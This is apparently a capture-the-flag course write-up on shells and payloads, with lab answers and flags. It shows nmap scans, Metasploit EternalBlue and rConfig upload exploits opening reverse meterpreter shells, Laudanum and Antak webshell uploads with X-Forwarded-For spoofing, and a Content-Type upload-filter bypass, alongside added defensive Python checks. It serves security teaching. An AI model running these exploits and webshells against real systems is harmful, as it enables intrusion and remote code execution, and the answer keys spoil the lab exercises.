Shells and Payloads
Shell Basics
Bind Shells
Tom can issue the command nc -lvnp 443 on a Linux target. Which port does he need to connect to from his attack box to successfully establish a shell session?
443
SSH to the target, create a bind shell, then use netcat to connect to the target through the bind shell you set up. When you have finished the exercise, submit the contents of the flag.txt file located in /customscripts.
B1nD_Shells_r_cool
Reverse Shells
When establishing a reverse shell session with a target, does the target act as the client or the server?
Client
Connect to the target via RDP, establish a reverse shell session with your attack box, then submit the contents of C:/flag.txt.
NextCyber{dYPosIkA-1jA761}
Windows Shells
Infiltrating Windows Systems
Operating system scan and detection
nmap -sV -sC -p- 10.18.251.236
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 17:11 CST
Nmap scan report for 10.18.251.236
Host is up (0.044s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7600 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::-
| Computer name: ecs-87246ef3-de5f-46ef-89ef-017e87c55782
| NetBIOS computer name: ECS-87246EF3-DE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-08-16T09:13:18-07:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: ECS-87246EF3-DE, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:66:4f:40 (unknown)
|_clock-skew: mean: 9h20m00s, deviation: 4h02m29s, median: 6h59m59s
| smb2-time:
| date: 2025-08-16T16:13:18
|_ start_date: 2025-08-16T16:11:12

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.52 seconds
The host is running Windows Server 2008 R2 Standard 7600.
MS17-010 (EternalBlue) affects hosts from Windows 2008 through Server 2016, so the target host very likely has this vulnerability. We can confirm it with the Metasploit auxiliary module auxiliary/scanner/smb/smb_ms17_010.
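The same scan output is what a defender sees when auditing this host. As an added example (not from the original write-up), the Python below parses the smb-os-discovery and smb-security-mode host-script lines and turns them into findings: an out-of-support OS, an RTM build number (7600; SP1 is 7601) too old to have taken the later servicing that included the MS17-010 fix, SMB signing not enforced, and a guest SMB session being accepted. The excerpt and the EOL product list are constructed for the example.

```python
import re

# Constructed excerpt of the host-script section of the nmap -sC output above.
NMAP_EXCERPT = """\
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
|   Computer name: ecs-87246ef3-de5f-46ef-89ef-017e87c55782
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   message_signing: disabled (dangerous, but default)
"""

# Product names that no longer receive security updates (constructed list).
EOL_PRODUCTS = ("Windows XP", "Windows Server 2003", "Windows Server 2008", "Windows 7")


def parse_script_lines(text):
    """Strip nmap's '|' / '|_' gutter and return the bare script lines."""
    return [re.sub(r"^\|_?\s*", "", line).strip() for line in text.splitlines()]


def smb_findings(text):
    """Return a list of (code, detail) findings derived from the SMB scripts."""
    findings = []
    for line in parse_script_lines(text):
        m = re.match(r"OS: (.+?) (\d{4,5}) \(", line)
        if m:
            product, build = m.group(1), int(m.group(2))
            if product.startswith(EOL_PRODUCTS):
                findings.append(("eol-os", f"{product} is out of support"))
            # 7600 is the Windows 7 / 2008 R2 RTM build; SP1 (7601) was a
            # prerequisite for the later security updates, MS17-010 included.
            if product.startswith("Windows Server 2008 R2") and build < 7601:
                findings.append(("no-sp1", "RTM build; verify MS17-010 patch status"))
        if "Message signing enabled but not required" in line:
            findings.append(("smb2-signing-not-required", line))
        if line.startswith("message_signing: disabled"):
            findings.append(("smb1-signing-disabled", line))
        if line == "account_used: guest":
            findings.append(("guest-session", "SMB guest/null session accepted"))
    return findings
```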
Open msfconsole and run the check with the console commands below. Set the RHOSTS field to the target's IP, then start the scan.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.18.251.236
RHOSTS => 10.18.251.236
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.18.251.236:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.16/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 10.18.251.236:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
From the scan results, the target host very likely has the EternalBlue vulnerability. Now let's set up the exploit module and payload to prepare the attack.
Configure the exploit module and payload
Here I first tried the psexec module recommended by the documentation, which did not succeed; the ms17_010_eternalblue module succeeded. The psexec variant recommended by the documentation relies on named pipes and is less stable.
Here we need to set the RHOSTS field. The other options can be left at their defaults.
use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 10.18.251.236
RHOST => 10.18.251.236
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.18.251.236    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.132.0.193     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.132.0.193:4444
[*] 10.18.251.236:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.18.251.236:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 10.18.251.236:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.18.251.236:445 - The target is vulnerable.
[*] 10.18.251.236:445 - Connecting to target for exploitation.
[+] 10.18.251.236:445 - Connection established for exploitation.
[+] 10.18.251.236:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.18.251.236:445 - CORE raw buffer dump (36 bytes)
[*] 10.18.251.236:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.18.251.236:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.18.251.236:445 - 0x00000020 37 36 30 30 7600
[+] 10.18.251.236:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.18.251.236:445 - Trying exploit with 12 Groom Allocations.
[*] 10.18.251.236:445 - Sending all but last fragment of exploit packet
[*] 10.18.251.236:445 - Starting non-paged pool grooming
[+] 10.18.251.236:445 - Sending SMBv2 buffers
[+] 10.18.251.236:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.18.251.236:445 - Sending final SMBv2 buffers.
[*] 10.18.251.236:445 - Sending last fragment of exploit packet!
[*] 10.18.251.236:445 - Receiving response from exploit packet
[+] 10.18.251.236:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.18.251.236:445 - Sending egg to corrupted connection.
[*] 10.18.251.236:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.18.251.236
[+] 10.18.251.236:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.18.251.236:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.18.251.236:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.132.0.193:4444 -> 10.18.251.236:49165) at 2025-08-16 17:32:06 +0800

meterpreter >
Success! We exploited the vulnerability and obtained a shell session.
What file type are text-based DOS scripts used to perform tasks from the command line? (Answer with the file extension, e.g. '.xxx')
.bat
Which Windows vulnerability was leaked by the Shadow Brokers? (Format: MS bulletin number, e.g. MSxx-xxx)
MS17-010
After gaining a shell on the vulnerable target, submit the contents of the flag.txt file in the C:\ directory.
NextCyber{KtJgi4GA-1lbx9y}
NIX Shells
Infiltrating Unix/Linux Systems
Enumerate the host
└─$ nmap -sV -sC -p- 10.22.208.194
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 18:10 CST
Nmap scan report for 10.22.208.194
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Unix) PHP7/7.2.19)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.39 (Unix) PHP7/7.2.19
19100/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; version=0.0.4; charset=utf-8).
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Sat, 16 Aug 2025 10:10:40 GMT
| HELP cadvisor_version_info A metric with a constant '1' value labeled by kernel version, OS version, docker version, cadvisor version & cadvisor revision.
| TYPE cadvisor_version_info gauge
| cadvisor_version_info{cadvisorRevision="",cadvisorVersion="",dockerVersion="Unknown",kernelVersion="4.18.0-147.5.2.14.h1051.eulerosv2r10.x86_64",osVersion="EulerOS 2.0 (SP9x86_64)"} 1
| HELP container_blkio_device_usage_total Blkio Device bytes usage
| TYPE container_blkio_device_usage_total counter
|_ container_blkio_device_usage_total{container="POD",device="/dev/vda",id="/kubepods/poda7e59e06-936e-
From the output we can see that the system is listening on port 80 (HTTP), that the web stack version is Apache/2.4.39 (Unix) PHP7/7.2.19, and the Linux distribution the system is running (Unix).
The hosted web application is rConfig, version 3.9.0:
msf6 > search rconfig

Matching Modules
================

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   exploit/multi/http/solr_velocity_rce                      2019-10-29       excellent  Yes    Apache Solr Remote Code Execution via Velocity Template
   1     \_ target: Java (in-memory)                             .                .          .      .
   2     \_ target: Unix (in-memory)                             .                .          .      .
   3     \_ target: Linux (dropper)                              .                .          .      .
   4     \_ target: x86/x64 Windows PowerShell                   .                .          .      .
   5     \_ target: x86/x64 Windows CmdStager                    .                .          .      .
   6     \_ target: Windows Exec                                 .                .          .      .
   7   auxiliary/gather/nuuo_cms_file_download                   2018-10-11       normal     No     Nuuo Central Management Server Authenticated Arbitrary File Download
   8   exploit/linux/http/rconfig_ajaxarchivefiles_rce           2020-03-11       good       Yes    Rconfig 3.x Chained Remote Code Execution
   9   exploit/linux/http/rconfig_vendors_auth_file_upload_rce   2021-03-17       excellent  Yes    rConfig Vendors Auth File Upload RCE
   10  exploit/unix/webapp/rconfig_install_cmd_exec              2019-10-28       excellent  Yes    rConfig install Command Execution
   11    \_ target: Automatic (Unix In-Memory)                   .                .          .      .
   12    \_ target: Automatic (Linux Dropper)                    .                .          .      .

Interact with a module by name or index. For example info 12, use 12 or use exploit/unix/webapp/rconfig_install_cmd_exec
After interacting with a module you can manually set a TARGET with set TARGET 'Automatic (Linux Dropper)'

msf6 > use 9
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
Because the target only exposes port 80, we need to set RHOSTS, RPORT and SSL.
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOSTS 10.22.208.194
RHOSTS => 10.22.208.194
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RPORT 80
RPORT => 80
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > options

Module options (exploit/linux/http/rconfig_vendors_auth_file_upload_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password of the admin account
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.22.208.194    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path of the rConfig server
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username of the admin account
   VHOST                       no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.132.0.193     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   rConfig <= 3.9.6

View the full module info with the info, or info -d command.

msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > run
[*] Started reverse TCP handler on 10.132.0.193:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 3.9.0 of rConfig found !
[+] The target appears to be vulnerable. Vulnerable version of rConfig found !
[+] We successfully logged in !
[*] Uploading file 'upnpimtgk.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (40004 bytes) to 10.22.208.194
[+] Deleted upnpimtgk.php
[*] Meterpreter session 1 opened (10.132.0.193:4444 -> 10.22.208.194:33608) at 2025-08-16 18:27:04 +0800
Find the hostname
meterpreter > shell
Process 668 created.
Channel 0 created.
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(proc)
whoami
root
ls
Thumbs.db
ajax-loader.gif
cisco.jpg
juniper.jpg
cd /
ls
bin
boot
dev
devicedetails
etc
home
lib
lib64
libx32
media
mnt
opt
proc
root
run
sbin
selinux
srv
sys
tmp
usr
var
cd devicedetails
ls
edgerouter-isp.yml
hostnameinfo.txt
cat hostnameinfo.txt
Note:All yaml (.yml) files should be named after the hostname of the router or switch they will configure. We discussed this in our meeting back in January. Ask Bob about it.c
The file hostnameinfo.txt does not state the hostname directly, but it contains an important hint: every YAML (.yml) file should be named after the hostname of the router or switch it configures, so the target router's hostname is edgerouter-isp.
When running rconfig_vendors_auth_file_upload_rce, what language is the uploaded payload written in?
php
Exploit the target and find the router's hostname in the devicedetails directory at the root of the file system.
edgerouter-isp
Web Shells
Laudanum webshell collection
Open the target IP in a browser and the welcome page appears. Press F12 to view the page source, which reveals the hint /Upload.aspx.
Browse to your-ip/Upload.aspx to find the file upload page.
Build the webshell as the documentation describes:
cp /usr/share/webshells/laudanum/aspx/shell.aspx /home/kali/demo.aspx
Edit demo.aspx: add your Kali IP (the attack box's IP), or comment out the IP-check logic so the IP is not checked when the shell is accessed; that way you do not need to modify XFF later and can open the shell file directly. Setting credentials, however, improves the security of the operation by ensuring nobody can casually walk in and use this shell.
└─$ vim demo.aspx
Then select your shell file and click Upload. It succeeds and prints the path the file was saved to.
Then click the upload path to access the webshell.
(In my case clicking the file path directly did not work; I had to use the Firefox extension HackBar to modify XFF, setting it to the attack box IP or one of the other IPs contained in the webshell file, and entering commands later also requires modifying XFF.)
Then use the uploaded Laudanum shell to issue commands to the host (typing a command and submitting it directly does not work either, since XFF is also checked on submit, so submit the command through HackBar's POST).
Checking the path succeeds: c:\windows\system32\inetsrv
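The Laudanum shell's IP allowlist is satisfied through the X-Forwarded-For header, which the client sets itself, which is why editing XFF in HackBar works above. As an added example (not from the write-up, Laudanum or the course), the Python below puts that header-only pattern beside the way a server-side allowlist should derive the client address: anchor on the TCP peer address and honour X-Forwarded-For only when the peer is a trusted proxy. TRUSTED_PROXIES and ALLOWED_CLIENTS are made-up values for the example.

```python
import ipaddress

# Constructed policy: only the reverse proxy in 10.0.0.0/8 may set
# X-Forwarded-For, and a single client address may reach the endpoint.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_CLIENTS = [ipaddress.ip_network("192.168.56.10/32")]


def header_only_check(headers):
    """The weak pattern: trust whatever address the request header claims."""
    claimed = headers.get("X-Forwarded-For", "").split(",")[0].strip()
    return bool(claimed) and any(ipaddress.ip_address(claimed) in net
                                 for net in ALLOWED_CLIENTS)


def client_ip(peer_addr, headers, trusted_proxies=TRUSTED_PROXIES):
    """Return the address that access control should be evaluated against.

    The TCP peer address is the one value the client cannot choose. The
    X-Forwarded-For header is honoured only when that peer is a trusted
    proxy, and then only its rightmost entry (the hop the proxy itself
    appended); anything earlier in the list was written by the client.
    """
    peer = ipaddress.ip_address(peer_addr)
    xff = headers.get("X-Forwarded-For", "")
    if xff and any(peer in net for net in trusted_proxies):
        return ipaddress.ip_address(xff.split(",")[-1].strip())
    return peer


def is_allowed(peer_addr, headers):
    """Allowlist check using the peer-anchored client address."""
    return any(client_ip(peer_addr, headers) in net for net in ALLOWED_CLIENTS)
```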
Establish a web shell session with the target using the concepts covered in this section. Submit the full path of the directory you land in as your answer.
c:\windows\system32\inetsrv
Antak Web Shell
Browse to the target IP, press F12 to view the page source and find the hint /Upload.aspx, then browse to ip/Upload.aspx to find the file upload page and upload the Antak web shell.
If you do not have the script the documentation mentions, you can get it here:
nishang/Antak-WebShell/antak.aspx at master · samratashok/nishang · GitHub
Modify the shell for use. The default login credentials here are Disclaimer:ForLegitUseOnly; you can also change them to a username and password of your own.
Browse to the uploaded file's address and log in to the webshell:
PS> whoami
iis apppool\defaultapppool
PS> dir C:\ -Recurse -Filter flag.txt -ErrorAction SilentlyContinue

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         8/17/2025   7:53 AM             29 flag.txt

PS> type C:\flag.txt
NextCyber{Ox6NwLjH-1krk9w}
Using the concepts covered in this section, establish a web shell on the target. Submit the name of the user on the target that the commands are issued as. To get the correct answer you must navigate to your uploaded web shell using the vHost name. (Format: **, 1 space)
iis apppool\defaultapppool
Get the contents of the flag on the target
NextCyber{Ox6NwLjH-1krk9w}
PHP web shell
Browse to the target IP, log in to rConfig with the default credentials (admin:admin), then navigate to Devices > Vendors and click Add Vendor.
Use WhiteWinterWolf's PHP web shell. We can download it or paste its source into a .php file.
Bypass the file type restriction and upload the PHP web shell using Burp. Click the Browse button, navigate to where the .php file is stored on our attack device, select Open and click Save.
We change the Content-Type from application/x-php to image/gif. This "tricks" the server into letting us upload the .php file, bypassing the file type restriction. Once done, click Forward twice and the file is submitted. Now we can turn off Burp's interceptor and return to the browser to see the result.
The message 'Added new vendor NetVen to Database' tells us the file upload succeeded.
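The upload check as the text describes it accepts the file once the client-supplied Content-Type says image/gif. As an added example (not rConfig's code and not from the original write-up), the Python below puts that weak pattern beside a validator that ignores Content-Type entirely and decides on an extension allowlist, the file's leading magic bytes and the absence of a PHP open tag; the sample bodies and the allowlist are constructed.

```python
import os

# Constructed sample bodies: a PHP file and a minimal 1x1 GIF.
PHP_BODY = b"<?php phpinfo(); ?>"
GIF_BODY = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

# Extension allowlist with the header bytes each format must start with.
ALLOWED_EXT = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
}


def weak_check(content_type):
    """The pattern the text describes: trust the client's Content-Type header."""
    return content_type.startswith("image/")


def validate_upload(filename, content_type, data):
    """Return (ok, reason). content_type is accepted but deliberately unused:
    the client chooses it, which is exactly what the Burp edit changes."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} is not on the allowlist"
    if not data.startswith(ALLOWED_EXT[ext]):
        return False, "file header does not match the extension"
    if b"<?" in data:  # refuse image/PHP polyglots as well
        return False, "PHP open tag embedded in image data"
    return True, "ok"
```

Storing the file under a server-generated name outside the web root, as a second layer, removes the remaining path by which an accepted upload could be executed.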
Open the webshell in the browser at ip:/images/vendor/upload.php and run:
ls /images/vendor/*gif
In the example shown, what must the Content-Type be changed to in order to upload the web shell successfully? (Format: .../...)
image/gif
Using what you learned in this section, obtain a web shell. What is the name of the gif file in the /images/vendor directory on the target? (Format: ****.gif)
ajax-loader.gif